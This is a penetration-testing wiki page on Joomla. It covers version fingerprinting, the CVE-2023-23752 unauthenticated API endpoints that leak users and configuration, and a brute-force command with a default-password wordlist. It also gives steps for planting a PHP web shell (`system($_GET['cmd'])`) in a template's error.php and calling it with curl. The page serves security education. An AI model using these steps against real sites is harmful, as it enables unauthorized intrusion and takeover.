joomla.md (5331B)
1 --- 2 title: "Joomla" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/joomla.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/joomla.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Joomla 14 15 ### Joomla Statistics 16 17 Joomla publishes opt-in anonymous usage statistics, including CMS, PHP, database, and operating-system distributions. The values below are only a historical response example; query the API for current data.<sup>[[2]](#references)</sup> 18 19 ```bash 20 curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool 21 22 { 23 "data": { 24 "cms_version": { 25 "3.0": 0, 26 "3.1": 0, 27 "3.10": 6.33, 28 "3.2": 0.01, 29 "3.3": 0.02, 30 "3.4": 0.05, 31 "3.5": 12.24, 32 "3.6": 22.85, 33 "3.7": 7.99, 34 "3.8": 17.72, 35 "3.9": 27.24, 36 "4.0": 3.21, 37 "4.1": 1.53, 38 "4.2": 0.82, 39 "4.3": 0, 40 "5.0": 0 41 }, 42 "total": 2951032 43 } 44 } 45 ``` 46 47 ## Enumeration 48 49 ### Discovery/Footprinting 50 51 - Check the **meta** 52 53 ```bash 54 curl https://www.joomla.org/ | grep Joomla | grep generator 55 56 <meta name="generator" content="Joomla! - Open Source Content Management" /> 57 ``` 58 59 - robots.txt 60 61 ```text 62 # If the Joomla site is installed within a folder 63 # eg www.example.com/joomla/ then the robots.txt file 64 # MUST be moved to the site root 65 # eg www.example.com/robots.txt 66 # AND the joomla folder name MUST be prefixed to all of the 67 # paths. 68 [...] 69 ``` 70 71 - README.txt 72 73 ```text 74 1- What is this? 75 * This is a Joomla! installation/upgrade package to version 3.x 76 * Joomla! Official site: https://www.joomla.org 77 * Joomla! 3.9 version history - [https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history](https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history) 78 * Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging 79 ``` 80 81 ### Version 82 83 - In **/administrator/manifests/files/joomla.xml** you can see the version. 84 - In **/language/en-GB/en-GB.xml** you can get the version of Joomla. 85 - In **plugins/system/cache/cache.xml** you can see an approximate version. 86 87 ### Automatic 88 89 ```bash 90 droopescan scan joomla --url http://joomla-site.local/ 91 ``` 92 93 In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](#cms-scanners) that can scan Joomla. 94 95 ### API Unauthenticated Information Disclosure: 96 97 Joomla 4.0.0 through 4.2.7 is affected by CVE-2023-23752, an improper API access check that can disclose configuration data. Exposure depends on the deployed configuration and accessible API routes; upgrade rather than relying on route filtering.<sup>[[3]](#references)</sup> 98 99 - Users: `http://<host>/api/v1/users?public=true` 100 - Config File: `http://<host>/api/index.php/v1/config/application?public=true` 101 102 **MSF module:** `scanner/http/joomla_api_improper_access_checks`; Exploit-DB also preserves a Ruby proof of concept.<sup>[[4]](#references)</sup> 103 104 ### Brute-Force 105 106 The `joomla-bruteforce` script can perform bounded credential testing against the login.<sup>[[5]](#references)</sup> 107 108 ```text 109 sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin 110 111 admin:admin 112 ``` 113 114 ## RCE 115 116 If you managed to get **admin credentials** you can **RCE inside of it** by adding a snippet of **PHP code** to gain **RCE**. We can do this by **customizing** a **template**. 117 118 1. **Click** on **`Templates`** on the bottom left under `Configuration` to pull up the templates menu. 119 2. **Click** on a **template** name. Let's choose **`protostar`** under the `Template` column header. This will bring us to the **`Templates: Customise`** page. 120 3. Finally, you can click on a page to pull up the **page source**. Let's choose the **`error.php`** page. We'll add a **PHP one-liner to gain code execution** as follows: 121 1. **`system($_GET['cmd']);`** 122 4. **Save & Close** 123 5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id` 124 125 ## From XSS to RCE 126 127 - **JoomSploit** documents chains that elevate XSS into RCE or other critical impact on supported Joomla 3.x through 5.x targets.<sup>[[1]](#references)[[6]](#references)</sup> It supports: 128 - _**Privilege escalation:**_ Creates a user in Joomla. 129 - _**(RCE) Built-in template edit:**_ Edits a built-in Joomla template. 130 - _**(Custom) Custom Exploits:**_ Custom Exploits for Third-Party Joomla Plugins. 131 132 ## References 133 134 - [1] [Elevating Low Vulnerabilities to Critical in CMSs and E-Commerce Platforms](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html) 135 - [2] [Joomla Developer Network — Usage Statistics API](https://developer.joomla.org/about/stats/api.html) 136 - [3] [NVD — CVE-2023-23752](https://nvd.nist.gov/vuln/detail/CVE-2023-23752) 137 - [4] [Exploit-DB 51334 — Joomla API unauthenticated information disclosure](https://www.exploit-db.com/exploits/51334) 138 - [5] [ajnik/joomla-bruteforce](https://github.com/ajnik/joomla-bruteforce) 139 - [6] [nowak0x01/JoomSploit](https://github.com/nowak0x01/JoomSploit)